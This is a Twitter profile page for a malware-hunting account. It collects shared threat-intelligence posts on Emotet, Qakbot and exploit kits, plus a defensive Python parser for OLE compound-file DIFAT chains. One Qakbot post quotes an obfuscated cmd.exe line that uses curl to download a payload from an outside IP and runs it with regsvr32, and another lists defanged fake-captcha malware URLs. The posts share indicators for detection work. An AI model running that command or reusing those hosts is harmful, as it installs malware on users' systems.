MalHunters (@malhunters)'s Twitter Profile
MalHunters

@malhunters

ID: 838991311407456256

Joined 07-03-2017 05:54:51

1.1K Tweets

529 Followers

216 Following

Reverse Engineering and More (@re_and_more)

RE tip of the day: If you want to manually debug a chain of XLM (aka Excel 4.0) macros in a document, you can use Excel for this purpose. Select a cell with the first formula and go to View -> Macros -> View Macros -> Step Into #infosec #cybersecurity #malware #reverseengineering

Virus Bulletin (@virusbtn)

On the SANS ISC blog, f_462_958 (@malware_traffic) reviews activity from a recent #Emotet infection. Many researchers have confirmed the return of Emotet. isc.sans.edu/diary/28044
Reverse Engineering and More (@re_and_more)

RE tip of the day: DIFAT is an array of 4-byte entries at the end of the MS-CFB header storing locations of FAT sectors. If it is not enough, the remaining entries are stored in dedicated DIFAT sectors pointed to in the header #infosec #cybersecurity #malware #reverseengineering

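The DIFAT walk described in the tip above, written out as an added Python example (not code from the tweet's author): it reads the 109 header entries, then follows the chain of DIFAT sectors through each sector's trailing "next" pointer, and refuses files whose chain loops or points outside the file, which is the part a malware-analysis parser most needs to get right. `build_sample_cfb` constructs a minimal compound file purely so the parser has something to run on; the field offsets and special sector values are those of the MS-CFB specification, everything else (function names, the sample layout) is this example's own.

```python
import struct

# MS-CFB header field offsets (little-endian) and the 109-entry header DIFAT
CFB_MAGIC        = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
OFF_SECTOR_SHIFT = 0x1E
OFF_NUM_FAT      = 0x2C
OFF_FIRST_DIFAT  = 0x44
OFF_NUM_DIFAT    = 0x48
OFF_HEADER_DIFAT = 0x4C
HEADER_DIFAT_ENTRIES = 109          # 436 bytes, fills the header to 512

# Special sector numbers from the spec
FREESECT   = 0xFFFFFFFF
ENDOFCHAIN = 0xFFFFFFFE
FATSECT    = 0xFFFFFFFD
DIFSECT    = 0xFFFFFFFC


def sector_offset(sector, sector_size):
    """File offset of a sector: sector 0 starts right after the 512-byte header."""
    return (sector + 1) * sector_size


def read_fat_sector_list(data):
    """Collect FAT sector locations from the header DIFAT and the DIFAT sector chain.

    Raises ValueError on a bad signature, a DIFAT sector beyond end of file,
    or a looping chain; a hostile OLE file can carry any of these.
    """
    if len(data) < 512 or data[:8] != CFB_MAGIC:
        raise ValueError("not a compound file (bad signature or truncated header)")
    sector_shift, = struct.unpack_from("<H", data, OFF_SECTOR_SHIFT)
    if sector_shift not in (9, 12):             # 512- or 4096-byte sectors only
        raise ValueError("unsupported sector shift %d" % sector_shift)
    sector_size = 1 << sector_shift
    num_fat_declared, = struct.unpack_from("<I", data, OFF_NUM_FAT)
    first_difat, = struct.unpack_from("<I", data, OFF_FIRST_DIFAT)
    num_difat_declared, = struct.unpack_from("<I", data, OFF_NUM_DIFAT)

    # Part 1: the entries embedded in the header (unused ones are FREESECT)
    header_entries = struct.unpack_from("<%dI" % HEADER_DIFAT_ENTRIES, data, OFF_HEADER_DIFAT)
    fat_sectors = [e for e in header_entries if e != FREESECT]

    # Part 2: the DIFAT sector chain; the last 4 bytes of each sector point to the next one
    visited = set()
    sector = first_difat
    while sector not in (ENDOFCHAIN, FREESECT):
        if sector in visited:
            raise ValueError("DIFAT chain loops at sector %d" % sector)
        visited.add(sector)
        off = sector_offset(sector, sector_size)
        if off + sector_size > len(data):
            raise ValueError("DIFAT sector %d lies beyond end of file" % sector)
        entries = struct.unpack_from("<%dI" % (sector_size // 4), data, off)
        fat_sectors.extend(e for e in entries[:-1] if e != FREESECT)
        sector = entries[-1]

    return {
        "sector_size": sector_size,
        "fat_sectors": fat_sectors,
        "num_fat_declared": num_fat_declared,
        "num_difat_declared": num_difat_declared,
        "num_difat_read": len(visited),
        # header counts disagreeing with what was actually found is a triage signal
        "consistent": len(fat_sectors) == num_fat_declared and len(visited) == num_difat_declared,
    }


def difat_error(data):
    """Return the parser's error message, or None if the DIFAT parses cleanly."""
    try:
        read_fat_sector_list(data)
        return None
    except ValueError as e:
        return str(e)


def build_sample_cfb(num_fat):
    """Construct a minimal 512-byte-sector compound file (constructed sample, not a real document).

    FAT sectors occupy 0..num_fat-1, DIFAT sectors follow; FAT contents stay zeroed.
    """
    sector_size = 512
    per_difat = sector_size // 4 - 1                        # 127 locations per DIFAT sector
    in_header = min(num_fat, HEADER_DIFAT_ENTRIES)
    num_difat = -(-(num_fat - in_header) // per_difat)      # ceiling division
    buf = bytearray((1 + num_fat + num_difat) * sector_size)
    buf[0:8] = CFB_MAGIC
    struct.pack_into("<HHHHH", buf, 0x18, 0x3E, 3, 0xFFFE, 9, 6)   # versions, byte order, shifts
    struct.pack_into("<I", buf, OFF_NUM_FAT, num_fat)
    struct.pack_into("<I", buf, 0x38, 0x1000)                       # mini stream cutoff
    struct.pack_into("<I", buf, OFF_FIRST_DIFAT, num_fat if num_difat else ENDOFCHAIN)
    struct.pack_into("<I", buf, OFF_NUM_DIFAT, num_difat)
    header_vals = [i if i < in_header else FREESECT for i in range(HEADER_DIFAT_ENTRIES)]
    struct.pack_into("<%dI" % HEADER_DIFAT_ENTRIES, buf, OFF_HEADER_DIFAT, *header_vals)
    next_fat = in_header
    for d in range(num_difat):
        vals = []
        for _ in range(per_difat):
            vals.append(next_fat if next_fat < num_fat else FREESECT)
            next_fat += 1
        vals.append(num_fat + d + 1 if d + 1 < num_difat else ENDOFCHAIN)
        struct.pack_into("<%dI" % (per_difat + 1), buf, sector_offset(num_fat + d, sector_size), *vals)
    return bytes(buf)


def with_difat_next_pointer(data, difat_sector, target):
    """Copy of data with one DIFAT sector's chain pointer rewritten (simulates a corrupt chain)."""
    sector_size = 1 << struct.unpack_from("<H", data, OFF_SECTOR_SHIFT)[0]
    buf = bytearray(data)
    struct.pack_into("<I", buf, sector_offset(difat_sector, sector_size) + sector_size - 4, target)
    return bytes(buf)


if __name__ == "__main__":
    for n in (3, 300):
        info = read_fat_sector_list(build_sample_cfb(n))
        print(n, "FAT sectors:", len(info["fat_sectors"]), "listed,",
              info["num_difat_read"], "DIFAT sector(s), consistent:", info["consistent"])
```

With 300 FAT sectors the header holds 109 locations and the remaining 191 spill into two DIFAT sectors (127 + 64), which is the case the tip describes; the loop guard matters because a crafted file can make the last DIFAT sector point back at the first.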
Alexandre Borges (@ale_sp_brazil)

The first article in the Malware Analysis Series (MAS) is available (36 pages):

(link 1): blackstormsecurity.com/docs/MAS_1.pdf

(link 2): exploitreversing.files.wordpress.com/2021/12/mas_1.…

Slides and other articles are available on: exploitreversing.com

#malware #reverseengineering #programming #threathunting
Myrtus (@myrtus0x0)

Clustered some more C2s. This time it's a period of a year and just focused on what might be overlapping with new #emotet. As expected there is some overlap with #dridex and old emotet. There are some other interesting connections there, but I'll leave that to the reader.

Cyber_OSINT (@cyber_o51nt)

Sygnia’s Incident Response team identified a threat group dubbed 'Elephant Beetle' (or TG2003) siphoning off funds from businesses in the financial sector in Latin America blog.sygnia.co/elephant-beetl…

Virus Bulletin (@virusbtn)

Avast researchers look at two browser exploit kits, MagnitudeEK & UnderminerEK, that are experimenting with exploit chains targeting unpatched users of Google Chrome & other Chromium-based browsers. decoded.avast.io/janvojtesek/ex…

Virus Bulletin (@virusbtn)

Cisco Talos's Chetan Raghuprasad (@CRaghuprasad) & Vanja Svajcer (@vanjasvajcer) write about Nanocore, Netwire & AsyncRAT campaigns that abuse public clouds. In this way threat actors can set up their infrastructure with minimal time/monetary commitments and detection is more difficult. blog.talosintelligence.com/2022/01/nanoco…
proxylife (@pr0xylife)

#Qakbot - obama197 - .html > .zip > .lnk > .dll

HTML Smuggling.

cmd.exe /c set r1=regsv && set cu=cur &&
call %windir%\system32\%cu%l -s -o %temp%\oneWhich.png 85.239.55.]212/whichABy.jpg
call %windir%\system32\%r1%r32 %temp%\oneWhich.png

IOC's
github.com/pr0xylife/Qakb…
JAMESWT (@jameswt_wt)

#emotet #epoch5 #heodo #Italy
Xls👇
bazaar.abuse.ch/sample/6df84a8…
Dll👇👇
bazaar.abuse.ch/sample/c15657a…
🔽Dll Urls🔽
urlhaus.abuse.ch/browse/tag/emo…
MalHunters (@malhunters)

Started writing about the top 100 malware families. It is just the beginning; I will update when I add new malware. cybrient.blogspot.com Suggestions are welcome.

JAMESWT (@jameswt_wt)

#booking #fakecaptcha
unitycommunityliving.]com/5253
👇
admin-extranetmnxz-captcha.]com/?ref=842727
👇
bknqsercise.]com/bomla
👇
admin-extranetadm-captcha.]com/updserc.zip

Samples
bazaar.abuse.ch/browse/tag/bkn…

AnyRun
app.any.run/tasks/1688a379…

cc Mikhail Kasimov (@500mk500) Kelsey (@k3dg3) ܛܔܔܔܛܔܛܔܛ (@skocherhan)

1/2